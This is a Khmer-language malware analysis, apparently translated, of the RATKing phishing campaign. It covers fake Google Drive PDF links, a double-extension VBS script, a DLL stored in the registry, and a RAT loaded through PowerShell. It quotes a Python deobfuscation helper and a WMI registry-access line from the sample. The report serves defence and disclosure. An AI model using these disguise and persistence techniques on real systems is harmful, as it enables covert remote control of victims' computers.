RATKingαŸ– αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαžαŸ’αž˜αžΈαž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎαž–αžΈαž…αž˜αŸ’αž„αžΆαž™ Trojan

αž“αŸ…αž…αž»αž„αžαŸ‚αž§αžŸαž—αžΆ αž™αžΎαž„αž”αžΆαž“αžšαž€αžƒαžΎαž‰αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαž˜αž½αž™αžŠαžΎαž˜αŸ’αž”αžΈαž…αŸ‚αž€αž…αžΆαž™αž˜αŸαžšαŸ„αž‚αž–αžΈαž…αž˜αŸ’αž„αžΆαž™ Trojan (RAT) αžŠαŸ‚αž›αž‡αžΆαž€αž˜αŸ’αž˜αžœαž·αž’αžΈαžŠαŸ‚αž›αž’αž“αž»αž‰αŸ’αž‰αžΆαžαž±αŸ’αž™αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž‚αŸ’αžšαž”αŸ‹αž‚αŸ’αžšαž„αž”αŸ’αžšαž–αŸαž“αŸ’αž’αž˜αŸαžšαŸ„αž‚αž–αžΈαž…αž˜αŸ’αž„αžΆαž™αŸ”

αž€αŸ’αžšαž»αž˜αžŠαŸ‚αž›αž™αžΎαž„αž”αžΆαž“αž–αž·αž“αž·αžαŸ’αž™αžαŸ’αžšαžΌαžœαž”αžΆαž“αžŸαž˜αŸ’αž‚αžΆαž›αŸ‹αžŠαŸ„αž™αž€αžΆαžšαž–αž·αžαžŠαŸ‚αž›αžαžΆαžœαžΆαž˜αž·αž“αž‡αŸ’αžšαžΎαžŸαžšαžΎαžŸαž‚αŸ’αžšαž½αžŸαžΆαžš RAT αž‡αžΆαž€αŸ‹αž›αžΆαž€αŸ‹αžŽαžΆαž˜αž½αž™αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž€αžΆαžšαž†αŸ’αž›αž„αŸ” Trojan αž‡αžΆαž…αŸ’αžšαžΎαž“αžαŸ’αžšαžΌαžœαž”αžΆαž“αž‚αŸαž€αžαŸ‹αžŸαž˜αŸ’αž‚αžΆαž›αŸ‹αžƒαžΎαž‰αž“αŸ…αž€αŸ’αž“αž»αž„αž€αžΆαžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž“αŸ…αž€αŸ’αž“αž»αž„αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžš (αžŠαŸ‚αž›αžœαžΆαž’αžΆαž…αž”αŸ’αžšαžΎαž”αžΆαž“αž™αŸ‰αžΆαž„αž‘αžΌαž›αŸ†αž‘αžΌαž›αžΆαž™)αŸ” αž‡αžΆαž˜αž½αž™αž“αžΉαž„αž›αž€αŸ’αžαžŽαŸˆαž–αž·αžŸαŸαžŸαž“αŸαŸ‡ αž€αŸ’αžšαž»αž˜αž“αŸαŸ‡αž”αžΆαž“αžšαŸ†αž­αž€αž™αžΎαž„αž’αŸ†αž–αžΈαžŸαŸ’αžαŸαž…αž€αžŽαŸ’αžαž»αžš αžŠαŸ‚αž›αž‡αžΆαžŸαžαŸ’αžœαž‘αŸαžœαž€αžαžΆαžŠαŸ‚αž›αž˜αžΆαž“αžŸαžαŸ’αžœαž€αž€αŸαžšαžŠαŸ‚αž›αž˜αžΆαž“αž€αž“αŸ’αž‘αž»αž™αž‡αžΆαž”αŸ‹αž‚αŸ’αž“αžΆαŸ”

RATKingαŸ– αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαžαŸ’αž˜αžΈαž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎαž–αžΈαž…αž˜αŸ’αž„αžΆαž™ Trojan
αžŠαžΎαž˜β€‹αž‚αžΊβ€‹αžαŸ’αžšαžΌαžœβ€‹αž”αžΆαž“β€‹αž™αž€β€‹αž…αŸαž‰β€‹αž–αžΈβ€‹αž’αž€αŸ’αžŸαžšαž€αžΆαžαŸ‹β€‹αžŠαŸ„αž™ K. N. Rossikov "αžŸαžαŸ’αžœβ€‹αž€αžŽαŸ’αžŠαž»αžš αž“αž·αž„β€‹αžŸαžαŸ’αžœβ€‹αž€αžŽαŸ’αžŠαž»αžšβ€‹αžŠαŸ‚αž›β€‹αžŸαŸ†αžαžΆαž“αŸ‹β€‹αž”αŸ†αž•αž»αžβ€‹αžαžΆαž„β€‹αžŸαŸαžŠαŸ’αž‹αž€αž·αž…αŸ’αž…" (1908)

αž€αŸ’αž“αž»αž„αž€αž·αžαŸ’αžαž·αž™αžŸαž“αŸƒαžŸαžαŸ’αžœαž“αŸαŸ‡ αž™αžΎαž„αž”αžΆαž“αžŠαžΆαž€αŸ‹αžˆαŸ’αž˜αŸ„αŸ‡αž€αŸ’αžšαž»αž˜αžŠαŸ‚αž›αž™αžΎαž„αž€αŸ†αž–αž»αž„αž–αž·αž…αžΆαžšαžŽαžΆ RATKing αŸ” αž“αŸ…αž€αŸ’αž“αž»αž„αž€αžΆαžšαž”αž„αŸ’αž αŸ„αŸ‡αž“αŸαŸ‡ αž™αžΎαž„αž“αžΉαž„αžšαŸ€αž”αžšαžΆαž”αŸ‹αž›αž˜αŸ’αž’αž·αžαž’αŸ†αž–αžΈαžšαž”αŸ€αž”αžŠαŸ‚αž›αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž’αž“αž»αžœαžαŸ’αžαž€αžΆαžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžš αžαžΆαžαžΎαž–αž½αž€αž‚αŸαž”αŸ’αžšαžΎαž§αž”αž€αžšαžŽαŸαž’αŸ’αžœαžΈαžαŸ’αž›αŸ‡ αž αžΎαž™αžαŸ‚αž˜αž‘αžΆαŸ†αž„αž…αŸ‚αž€αžšαŸ†αž›αŸ‚αž€αž‚αŸ†αž“αž·αžαžšαž”αžŸαŸ‹αž™αžΎαž„αž›αžΎαž‚αž»αžŽαž›αž€αŸ’αžαžŽαŸˆαžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαž“αŸαŸ‡αž•αž„αžŠαŸ‚αžšαŸ”

αžœαžŒαŸ’αžαž“αž—αžΆαž–αž“αŸƒαž€αžΆαžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžš

αž€αžΆαžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž‘αžΆαŸ†αž„αž’αžŸαŸ‹αž“αŸ…αž€αŸ’αž“αž»αž„αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαž“αŸαŸ‡αž”αžΆαž“αž€αžΎαžαž‘αžΎαž„αžŠαŸ„αž™αž™αŸ„αž„αžαžΆαž˜αž€αŸ’αž”αž½αž“αžŠαŸ„αŸ‡αžŸαŸ’αžšαžΆαž™αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

  1. αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž”αžΆαž“αž‘αž‘αž½αž›αž’αŸŠαžΈαž˜αŸ‚αž›αž”αž“αŸ’αž›αŸ†αžŠαŸ‚αž›αž˜αžΆαž“αžαŸ†αžŽαž‘αŸ…αž€αžΆαž“αŸ‹ Google Drive αŸ”
  2. αžŠαŸ„αž™αž”αŸ’αžšαžΎαžαŸ†αžŽαž—αŸ’αž‡αžΆαž”αŸ‹ αž‡αž“αžšαž„αž‚αŸ’αžšαŸ„αŸ‡αž”αžΆαž“αž‘αžΆαž‰αž™αž€αžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS αž–αŸ’αž™αžΆαž”αžΆαž‘ αžŠαŸ‚αž›αž”αž‰αŸ’αž‡αžΆαž€αŸ‹αž”αžŽαŸ’αžŽαžΆαž›αŸαž™ DLL αžŠαžΎαž˜αŸ’αž”αžΈαž•αŸ’αž‘αž»αž€αž”αž“αŸ’αž‘αž»αž€αž…αž»αž„αž€αŸ’αžšαŸ„αž™αž‘αŸ…αž€αŸ’αž“αž»αž„αž”αž‰αŸ’αž‡αžΈαžˆαŸ’αž˜αŸ„αŸ‡αžœαžΈαž“αžŠαžΌ αž αžΎαž™αž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš PowerShell αžŠαžΎαž˜αŸ’αž”αžΈαž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αžœαžΆαŸ”
  3. αž”αžŽαŸ’αžŽαžΆαž›αŸαž™ DLL αž”αžΆαž“αž…αžΆαž€αŸ‹αž”αž‰αŸ’αž…αžΌαž›αž”αž“αŸ’αž‘αž»αž€αž…αž»αž„αž€αŸ’αžšαŸ„αž™ - αžαžΆαž˜αž–αž·αž RATs αž˜αž½αž™αžŠαŸ‚αž›αžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αžŠαŸ„αž™αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž”αŸ’αžšαž–αŸαž“αŸ’αž’ αž“αž·αž„αž”αžΆαž“αž…αž»αŸ‡αžˆαŸ’αž˜αŸ„αŸ‡αžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS αž€αŸ’αž“αž»αž„ autorun αžŠαžΎαž˜αŸ’αž”αžΈαž‘αž‘αž½αž›αž”αžΆαž“αž˜αžΌαž›αžŠαŸ’αž‹αžΆαž“αž“αŸ…αž€αŸ’αž“αž»αž„αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αžŠαŸ‚αž›αž˜αžΆαž“αž˜αŸαžšαŸ„αž‚αŸ”
  4. αž”αž“αŸ’αž‘αž»αž€αž…αž»αž„αž€αŸ’αžšαŸ„αž™αžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αŸ’αž“αž»αž„αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž”αŸ’αžšαž–αŸαž“αŸ’αž’ αž“αž·αž„αž•αŸ’αžαž›αŸ‹αž±αŸ’αž™αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž“αžΌαžœαžŸαž˜αžαŸ’αžαž—αžΆαž–αž€αŸ’αž“αž»αž„αž€αžΆαžšαž‚αŸ’αžšαž”αŸ‹αž‚αŸ’αžšαž„αž€αž»αŸ†αž–αŸ’αž™αžΌαž‘αŸαžšαžŠαŸ‚αž›αž˜αžΆαž“αž˜αŸαžšαŸ„αž‚αŸ”

αžαžΆαž˜αž‚αŸ’αžšαŸ„αž„αž€αžΆαžšαžŽαŸ αžœαžΆαž’αžΆαž…αžαŸ’αžšαžΌαžœαž”αžΆαž“αžαŸ†αžŽαžΆαž„αžŠαžΌαž…αž“αŸαŸ‡αŸ–

RATKingαŸ– αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαžαŸ’αž˜αžΈαž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎαž–αžΈαž…αž˜αŸ’αž„αžΆαž™ Trojan

αž”αž“αŸ’αž‘αžΆαž”αŸ‹ αž™αžΎαž„αž“αžΉαž„αž•αŸ’αžαŸ„αžαž›αžΎαž”αžΈαžŠαŸ†αžŽαžΆαž€αŸ‹αž€αžΆαž›αžŠαŸ†αž”αžΌαž„ αžŠαŸ„αž™αžŸαžΆαžšαž™αžΎαž„αž…αžΆαž”αŸ‹αž’αžΆαžšαž˜αŸ’αž˜αžŽαŸαž›αžΎαž™αž“αŸ’αžαž€αžΆαžšαž…αŸ‚αž€αž…αžΆαž™αž˜αŸαžšαŸ„αž‚αŸ” αž™αžΎαž„αž“αžΉαž„αž˜αž·αž“αžšαŸ€αž”αžšαžΆαž”αŸ‹αž›αž˜αŸ’αž’αž·αžαž’αŸ†αž–αžΈαž™αž“αŸ’αžαž€αžΆαžšαž“αŸƒαž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžšαž”αžŸαŸ‹αž˜αŸαžšαŸ„αž‚αžαŸ’αž›αž½αž“αž―αž„αž“αŸ„αŸ‡αž‘αŸαŸ” αž–αž½αž€αžœαžΆαž’αžΆαž…αžšαž€αž”αžΆαž“αž™αŸ‰αžΆαž„αž‘αžΌαž›αŸ†αž‘αžΌαž›αžΆαž™ - αž›αž€αŸ‹αž“αŸ…αž›αžΎαžœαŸαž‘αž·αž€αžΆαž―αž€αž‘αŸαžŸ αž¬αžŸαžΌαž˜αŸ’αž”αžΈαžαŸ‚αž…αŸ‚αž€αž…αžΆαž™αž‡αžΆαž‚αž˜αŸ’αžšαŸ„αž„αž”αŸ’αžšαž—αž–αž”αžΎαž€αž…αŸ†αž  - αžŠαžΌαž…αŸ’αž“αŸαŸ‡αž αžΎαž™αž˜αž·αž“αž˜αžΆαž“αžαŸ‚αž˜αž½αž™αž‚αžαŸ‹αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž€αŸ’αžšαž»αž˜ RATKing αž‘αŸαŸ”

αž€αžΆαžšαžœαž·αž—αžΆαž‚αžŠαŸ†αžŽαžΆαž€αŸ‹αž€αžΆαž›αž“αŸƒαž€αžΆαžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžš

αžŠαŸ†αžŽαžΆαž€αŸ‹αž€αžΆαž›αž‘αžΈ 1. αž’αŸŠαžΈαž˜αŸ‰αŸ‚αž›αž”αž“αŸ’αž›αŸ†

αž€αžΆαžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž”αžΆαž“αž…αžΆαž”αŸ‹αž•αŸ’αžαžΎαž˜αžŠαŸ„αž™αž‡αž“αžšαž„αž‚αŸ’αžšαŸ„αŸ‡αž‘αž‘αž½αž›αž”αžΆαž“αžŸαŸ†αž”αž»αžαŸ’αžšαž–αŸ’αž™αžΆαž”αžΆαž‘ (αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž”αžΆαž“αž”αŸ’αžšαžΎαž‚αŸ†αžšαžΌαž•αŸ’αžŸαŸαž„αŸ—αž‡αžΆαž˜αž½αž™αž’αžαŸ’αžαž”αž‘ αžšαžΌαž”αžαžαž’αŸαž€αŸ’αžšαž„αŸ‹αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž”αž„αŸ’αž αžΆαž‰αž§αž‘αžΆαž αžšαžŽαŸαž˜αž½αž™)αŸ” αžŸαžΆαžšαž˜αžΆαž“αžαŸ†αžŽαž—αŸ’αž‡αžΆαž”αŸ‹αž‘αŸ…αž€αžΆαž“αŸ‹αžƒαŸ’αž›αžΆαŸ†αž„αžŸαŸ’αžšαž”αž…αŸ’αž”αžΆαž”αŸ‹ drive.google.comαžŠαŸ‚αž›αžŸαž“αŸ’αž˜αžαžαžΆαž“αžΆαŸ†αž‘αŸ…αžŠαž›αŸ‹αž‘αŸ†αž–αŸαžšαž‘αžΆαž‰αž™αž€αž―αž€αžŸαžΆαžš PDF αŸ”

RATKingαŸ– αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαžαŸ’αž˜αžΈαž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎαž–αžΈαž…αž˜αŸ’αž„αžΆαž™ Trojan
αž§αž‘αžΆαž αžšαžŽαŸαž“αŸƒαž’αŸŠαžΈαž˜αŸ‚αž›αž”αž“αŸ’αž›αŸ†

αž‘αŸ„αŸ‡αž™αŸ‰αžΆαž„αžŽαžΆαž€αŸαžŠαŸ„αž™αžαžΆαž˜αž–αž·αžαžœαžΆαž˜αž·αž“αž˜αŸ‚αž“αž‡αžΆαž―αž€αžŸαžΆαžš PDF αžŠαŸ‚αž›αžαŸ’αžšαžΌαžœαž”αžΆαž“αž•αŸ’αž‘αž»αž€αž‘αžΆαž›αŸ‹αžαŸ‚αžŸαŸ„αŸ‡ αž”αŸ‰αž»αž“αŸ’αžαŸ‚αž‡αžΆαžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS αŸ”

αž“αŸ…αž–αŸαž›αž’αŸ’αž“αž€αž…αž»αž…αž›αžΎαžαŸ†αžŽαž–αžΈαž’αŸŠαžΈαž˜αŸ‚αž›αž€αŸ’αž“αž»αž„αžšαžΌαž”αžαžαž’αŸαž€αŸ’αžšαž„αŸ‹αžαžΆαž„αž›αžΎ αž―αž€αžŸαžΆαžšαž˜αž½αž™αž˜αžΆαž“αžˆαŸ’αž˜αŸ„αŸ‡ Cargo Flight Details.vbs. αž€αŸ’αž“αž»αž„αž€αžšαžŽαžΈαž“αŸαŸ‡ αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž˜αž·αž“αž”αžΆαž“αžŸαžΌαž˜αŸ’αž”αžΈαžαŸ‚αž–αŸ’αž™αžΆαž™αžΆαž˜αž€αŸ’αž›αŸ‚αž„αž―αž€αžŸαžΆαžšαž“αŸ„αŸ‡αž‡αžΆαž―αž€αžŸαžΆαžšαžŸαŸ’αžšαž”αž…αŸ’αž”αžΆαž”αŸ‹αŸ”

αž€αŸ’αž“αž»αž„αž–αŸαž›αž‡αžΆαž˜αž½αž™αž‚αŸ’αž“αžΆαž“αŸαŸ‡ αž‡αžΆαž•αŸ’αž“αŸ‚αž€αž“αŸƒαž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαž“αŸαŸ‡ αž™αžΎαž„αž”αžΆαž“αžšαž€αžƒαžΎαž‰αžŸαŸ’αž‚αŸ’αžšαžΈαž”αž˜αž½αž™αžŠαŸ‚αž›αž˜αžΆαž“αžˆαŸ’αž˜αŸ„αŸ‡αžαžΆ Cargo Trip Detail.pdf.vbs. αžœαžΆβ€‹αž’αžΆαž…β€‹αž†αŸ’αž›αž„β€‹αž•αž»αžβ€‹αžŸαž˜αŸ’αžšαžΆαž”αŸ‹ PDF αžŸαŸ’αžšαž”αž…αŸ’αž”αžΆαž”αŸ‹β€‹αžšαž½αž…β€‹αž αžΎαž™ αž–αŸ’αžšαŸ„αŸ‡ Windows αž›αžΆαž€αŸ‹β€‹αž•αŸ’αž“αŸ‚αž€αž”αž“αŸ’αžαŸ‚αž˜β€‹αž―αž€αžŸαžΆαžšβ€‹αžαžΆαž˜β€‹αž›αŸ†αž“αžΆαŸ†αžŠαžΎαž˜αŸ” αž–αž·αžαž αžΎαž™ αž€αŸ’αž“αž»αž„αž€αžšαžŽαžΈαž“αŸαŸ‡ αž€αžΆαžšαžŸαž„αŸ’αžŸαŸαž™αž“αŸ…αžαŸ‚αž’αžΆαž…αž”αž„αŸ’αž€αž‘αžΎαž„αžŠαŸ„αž™αžšαžΌαž”αžαŸ†αžŽαžΆαž„αžšαž”αžŸαŸ‹αžœαžΆ αžŠαŸ‚αž›αžαŸ’αžšαžΌαžœαž“αžΉαž„αžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS αŸ”

αž“αŸ…αžŠαŸ†αžŽαžΆαž€αŸ‹αž€αžΆαž›αž“αŸαŸ‡ αž‡αž“αžšαž„αž‚αŸ’αžšαŸ„αŸ‡αž’αžΆαž…αž‘αž‘αž½αž›αžŸαŸ’αž‚αžΆαž›αŸ‹αž€αžΆαžšαž”αŸ„αž€αž”αž‰αŸ’αž†αŸ„αžαŸ– αž‚αŸ’αžšαžΆαž“αŸ‹αžαŸ‚αž˜αžΎαž›αž²αŸ’αž™αž€αžΆαž“αŸ‹αžαŸ‚αž…αŸ’αž”αžΆαžŸαŸ‹αž“αžΌαžœαž―αž€αžŸαžΆαžšαžŠαŸ‚αž›αž”αžΆαž“αž‘αžΆαž‰αž™αž€αž˜αž½αž™αžœαž·αž“αžΆαž‘αžΈαŸ” αž‘αŸ„αŸ‡αž‡αžΆαž™αŸ‰αžΆαž„αžŽαžΆαž€αŸαžŠαŸ„αž™ αž“αŸ…αž€αŸ’αž“αž»αž„αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαž”αž“αŸ’αž›αŸ†αž”αŸ‚αž”αž“αŸαŸ‡ αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαžαŸ‚αž„αžαŸ‚αž–αžΉαž„αž•αŸ’αž’αŸ‚αž€αž›αžΎαž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αžŠαŸ‚αž›αž˜αž·αž“αž™αž€αž…αž·αžαŸ’αžαž‘αž»αž€αžŠαžΆαž€αŸ‹ αž¬αž”αŸ’αžšαž‰αžΆαž”αŸ‹αž”αŸ’αžšαž‰αžΆαž›αŸ‹αŸ”

αžŠαŸ†αžŽαžΆαž€αŸ‹αž€αžΆαž›αž‘αžΈ 2. αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS

αžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS αžŠαŸ‚αž›αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž’αžΆαž…αž”αžΎαž€αžŠαŸ„αž™αž’αž…αŸαžαž“αžΆ αž”αžΆαž“αž…αž»αŸ‡αžˆαŸ’αž˜αŸ„αŸ‡αž”αžŽαŸ’αžŽαžΆαž›αŸαž™ DLL αž“αŸ…αž€αŸ’αž“αž»αž„αž”αž‰αŸ’αž‡αžΈαžˆαŸ’αž˜αŸ„αŸ‡αžœαžΈαž“αžŠαžΌαŸ” αžŸαŸ’αž‚αŸ’αžšαžΈαž”αžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ†αž—αžΆαž“αŸ‹αŸ– αž”αž“αŸ’αž‘αžΆαžαŸ‹αž“αŸ…αž€αŸ’αž“αž»αž„αžœαžΆαžαŸ’αžšαžΌαžœαž”αžΆαž“αžŸαžšαžŸαŸαžšαž‡αžΆαž”αŸƒαžŠαŸ‚αž›αž”αŸ†αž”αŸ‚αž€αžŠαŸ„αž™αžαž½αž’αž€αŸ’αžŸαžšαž”αŸ†αž–αžΆαž“αŸ”

RATKingαŸ– αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαžαŸ’αž˜αžΈαž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎαž–αžΈαž…αž˜αŸ’αž„αžΆαž™ Trojan
αž§αž‘αžΆαž αžšαžŽαŸβ€‹αž“αŸƒβ€‹αžŸαŸ’αž‚αŸ’αžšαžΈαž”β€‹αž˜αž·αž“β€‹αž…αŸ’αž”αžΆαžŸαŸ‹

αž€αŸ’αž”αž½αž“αžŠαŸ„αŸ‡αžŸαŸ’αžšαžΆαž™ deobfuscation αž‚αžΊαžŸαžΆαž˜αž‰αŸ’αž‰αžŽαžΆαžŸαŸ‹αŸ– αžšαžΆαž›αŸ‹αžαž½αž’αž€αŸ’αžŸαžšαž‘αžΈαž”αžΈαžαŸ’αžšαžΌαžœαž”αžΆαž“αžŠαž€αž…αŸαž‰αž–αžΈαžαŸ’αžŸαŸ‚αž’αž€αŸ’αžŸαžšαžŠαŸ‚αž›αž”αŸ†αž—αžΆαž“αŸ‹ αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αž›αž‘αŸ’αž’αž•αž›αžαŸ’αžšαžΌαžœαž”αžΆαž“αžŒαž·αž€αžΌαžŠαž–αžΈ base16 αž‘αŸ…αž€αŸ’αž“αž»αž„αžαŸ’αžŸαŸ‚αž’αž€αŸ’αžŸαžšαžŠαžΎαž˜αŸ” αž§αž‘αžΆαž αžšαžŽαŸαž–αžΈαžαž˜αŸ’αž›αŸƒ 57Q53s63t72s69J70r74e2El53v68m65j6CH6Ct (αž”αž“αŸ’αž›αž·αž…αž“αŸ…αž€αŸ’αž“αž»αž„αžšαžΌαž”αžαžαž’αŸαž€αŸ’αžšαž„αŸ‹αžαžΆαž„αž›αžΎ) αž”αž“αŸ’αž‘αžΆαžαŸ‹αž›αž‘αŸ’αž’αž•αž›αž‚αžΊ WScript.Shell.

αžŠαžΎαž˜αŸ’αž”αžΈαž”αŸ†αž”αžΆαžαŸ‹αžαŸ’αžŸαŸ‚αž’αž€αŸ’αžŸαžš αž™αžΎαž„αž”αžΆαž“αž”αŸ’αžšαžΎαž˜αž»αžαž„αžΆαžš PythonαŸ–

def decode_str(data_enc):   
    return binascii.unhexlify(''.join([data_enc[i:i+2] for i in range(0, len(data_enc), 3)]))

αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž“αŸ…αž›αžΎαž”αž“αŸ’αž‘αžΆαžαŸ‹αž‘αžΈ 9-10 αž™αžΎαž„αž‚αžΌαžŸαž”αž‰αŸ’αž‡αžΆαž€αŸ‹αž–αžΈαžαž˜αŸ’αž›αŸƒαžŠαŸ‚αž›αž€αžΆαžšαž’αŸ’αžœαžΎαž±αŸ’αž™αžαžΌαž…αž‘αŸ’αžšαž„αŸ‹αž‘αŸ’αžšαžΆαž™αž“αŸƒαž―αž€αžŸαžΆαžš DLL αŸ” αžœαžΆαž‚αžΊαž‡αžΆαž‚αžΆαžαŸ‹αžŠαŸ‚αž›αžαŸ’αžšαžΌαžœαž”αžΆαž“αžŠαžΆαž€αŸ‹αž±αŸ’αž™αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž“αŸ…αžŠαŸ†αžŽαžΆαž€αŸ‹αž€αžΆαž›αž”αž“αŸ’αž‘αžΆαž”αŸ‹αžŠαŸ„αž™αž”αŸ’αžšαžΎ PowerShell αŸ”

RATKingαŸ– αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαžαŸ’αž˜αžΈαž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎαž–αžΈαž…αž˜αŸ’αž„αžΆαž™ Trojan
αžαŸ’αžŸαŸ‚αž’αž€αŸ’αžŸαžšαž‡αžΆαž˜αž½αž™ DLL αžŠαŸ‚αž›αž˜αž·αž“αž…αŸ’αž”αžΆαžŸαŸ‹

αž˜αž»αžαž„αžΆαžšαž“αžΈαž˜αž½αž™αŸ—αž“αŸ…αž€αŸ’αž“αž»αž„αžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS αžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž· αžŠαŸ„αž™αžŸαžΆαžšαžαŸ’αžŸαŸ‚αž’αž€αŸ’αžŸαžšαžαŸ’αžšαžΌαžœαž”αžΆαž“αž›αž»αž”αž…αŸ„αž›αŸ”

αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž–αžΈαžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαžŸαŸ’αž‚αŸ’αžšαžΈαž”αž˜αž»αžαž„αžΆαžšαžαŸ’αžšαžΌαžœαž”αžΆαž“αž αŸ… wscript.sleep - αžœαžΆαžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžΎαžŠαžΎαž˜αŸ’αž”αžΈαž’αž“αž»αžœαžαŸ’αžαž€αžΆαžšαž–αž“αŸ’αž™αžΆαž–αŸαž›αŸ”

αž”αž“αŸ’αž‘αžΆαž”αŸ‹β€‹αž˜αž€ αžŸαŸ’αž‚αŸ’αžšαžΈαž”β€‹αž”αžΆαž“β€‹αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšβ€‹αž‡αžΆαž˜αž½αž™β€‹αž“αžΉαž„β€‹αž”αž‰αŸ’αž‡αžΈβ€‹αžˆαŸ’αž˜αŸ„αŸ‡β€‹αžœαžΈαž“αžŠαžΌαŸ” αž‚αžΆαžαŸ‹αž”αžΆαž“αž”αŸ’αžšαžΎαž”αž…αŸ’αž…αŸαž€αžœαž·αž‘αŸ’αž™αžΆ WMI αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αžšαžΏαž„αž“αŸαŸ‡αŸ” αžŠαŸ„αž™αž˜αžΆαž“αž‡αŸ†αž“αž½αž™αžšαž”αžŸαŸ‹αžœαžΆ αžŸαŸ„αž–αž·αžŸαŸαžŸαž˜αž½αž™αžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αž„αŸ’αž€αžΎαžαž‘αžΎαž„ αž αžΎαž™αžαž½αž“αŸƒαž―αž€αžŸαžΆαžšαžŠαŸ‚αž›αž’αžΆαž…αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž”αžΆαž“αžαŸ’αžšαžΌαžœαž”αžΆαž“αžŸαžšαžŸαŸαžšαž‘αŸ…αž€αžΆαž“αŸ‹αž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžšαžšαž”αžŸαŸ‹αžœαžΆαŸ” αž”αž‰αŸ’αž‡αžΈαžˆαŸ’αž˜αŸ„αŸ‡αžαŸ’αžšαžΌαžœαž”αžΆαž“αž…αžΌαž›αž”αŸ’αžšαžΎαžαžΆαž˜αžšαž™αŸˆ WMI αžŠαŸ„αž™αž”αŸ’αžšαžΎαž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

GetObject(winmgmts {impersonationLevel=impersonate}!\.rootdefault:StdRegProv)

